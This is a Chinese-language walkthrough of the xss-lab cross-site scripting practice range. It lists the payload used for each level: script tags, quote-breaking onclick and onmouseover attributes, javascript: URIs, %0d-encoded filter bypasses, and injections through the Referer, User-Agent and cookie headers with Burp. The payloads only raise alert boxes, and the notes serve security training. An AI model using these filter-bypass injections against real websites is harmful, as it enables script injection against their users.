xsslab是最经典的xss练习靶场。 GitHub地址--https://github.com/rebo-rn/xss-lab 本人使用在线靶场--http://xss.xiejiahe.com/ 换个在线靶场--http://test.ctf8.com/
http://xss-ctf.xiejiahe.com/level1?name=%3Cscript%3Ealert(1)%3C/script%3E
"onclick="alert(1)
' onclick=alert(/xss/)//
" onclick = "alert(1)""
"><iframe src=javascript:alert(/xss/)>
"><a href=" javascript:alert(/xss/)"
注意这个小线条才是a标签
"Onclick="alert(1)
"Onclick="alert(1)
javascript:alert(1)
javascript:%0dhttp://%0dalert(/xss/)
%0d
是空字符串的URL编码
查看源码发现需要两个GET参数,一个是keyword,一个是t_sort。
keyword=test&t_sort="type="text" onclick="alert(/xss/)
需要先代码审计一下,payload位置在请求头Referer参数
使用burp工具拦截修改请求头后再发送请求
" onmouseover=alert(/xss/) type="text"
和十一payload一样,只是位置是请求头User-Agent参数值
payload的位置在cookie中,burp拦截添加cookie
user=" type="text" onmouseover=alert(/xss/) type="text"